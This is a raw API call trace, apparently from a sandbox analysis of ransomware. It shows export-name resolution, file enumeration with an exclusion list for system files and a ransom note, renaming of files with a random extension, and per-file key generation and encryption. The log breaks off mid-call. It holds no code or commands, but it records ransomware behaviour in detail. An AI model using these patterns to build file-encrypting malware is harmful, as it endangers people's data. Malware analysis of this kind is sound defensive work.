[0085.414] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.414] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.415] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.415] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.415] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.415] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.415] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.415] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.415] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.415] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.415] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.415] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.415] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.415] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.415] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.415] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.415] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.415] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.415] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.415] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.415] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.416] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.416] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.416] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.416] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.416] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.416] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.416] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.416] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.416] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.416] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.416] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.416] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.416] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.416] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.416] lstrlenA (lpString="DELETEATOM") returned 10 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.416] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.416] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.416] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.416] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.417] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.417] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.417] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.417] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.417] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.417] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.417] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.417] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.417] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.417] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.417] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.417] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.417] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.417] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.417] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.417] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.417] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.417] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.417] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.418] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.418] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.418] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.418] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.418] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.418] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.418] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.418] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.418] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.418] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.418] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.418] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.418] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.418] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.418] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.418] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.418] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.418] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.418] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.419] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.419] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0085.419] lstrcpyA (in: lpString1=0x3f2ccf4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0085.419] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0085.419] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3") returned 88 [0085.419] wsprintfW (in: param_1=0x3f2d9ac, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3.wEbcB") returned 94 [0085.419] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\gt8583vjq.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\gT8583vJq.mp3.wEbcB" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\gt8583vjq.mp3.webcb"), dwFlags=0x0) returned 1 [0085.420] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.420] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.420] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.421] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf18f120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf18f120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf18f120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0085.421] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0085.421] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.421] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0085.421] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0085.421] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0085.421] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0085.421] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0085.421] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0085.421] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" [0085.421] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\jkbimi8.tmp" [0085.421] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.421] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0085.422] CloseHandle (hObject=0x0) returned 0 [0085.422] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.422] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa62648c0, ftCreationTime.dwHighDateTime=0x1d4c6c9, ftLastAccessTime.dwLowDateTime=0xfbfbb0f0, ftLastAccessTime.dwHighDateTime=0x1d4c601, ftLastWriteTime.dwLowDateTime=0xfbfbb0f0, ftLastWriteTime.dwHighDateTime=0x1d4c601, nFileSizeHigh=0x0, nFileSizeLow=0x13e6f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yz_Genn7GM5k.wav", cAlternateFileName="YZ_GEN~1.WAV")) returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="DECRYPT-FILES.txt") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="autorun.inf") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="boot.ini") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="desktop.ini") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="ntuser.dat") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="iconcache.db") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="bootsect.bak") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="ntuser.dat.log") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="thumbs.db") returned 1 [0085.422] lstrcmpiW (lpString1="Yz_Genn7GM5k.wav", lpString2="Bootfont.bin") returned 1 [0085.423] lstrlenW (lpString="Yz_Genn7GM5k.wav") returned 16 [0085.423] lstrcmpiW (lpString1="wav", lpString2="lnk") returned 1 [0085.423] lstrcmpiW (lpString1="wav", lpString2="exe") returned 1 [0085.423] lstrcmpiW (lpString1="wav", lpString2="sys") returned 1 [0085.423] lstrcmpiW (lpString1="wav", lpString2="dll") returned 1 [0085.423] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned 75 [0085.423] lstrlenW (lpString="Yz_Genn7GM5k.wav") returned 16 [0085.423] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\" [0085.423] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\", lpString2="Yz_Genn7GM5k.wav" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav" [0085.423] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.423] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\PNWITRgLH_4la7ri\\6FQU\\X7DdBKuwCUHgUBoP\\Yz_Genn7GM5k.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\pnwitrglh_4la7ri\\6fqu\\x7ddbkuwcuhgubop\\yz_genn7gm5k.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0085.423] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2d978 | out: lpFileSize=0x3f2d978*=81519) returned 1 [0085.423] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0085.423] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.424] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.424] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.424] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.424] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2d8e0*=0x100) returned 1 [0085.424] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0085.426] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.426] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.427] CloseHandle (hObject=0x444) returned 1 [0085.427] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.427] WriteFile (in: 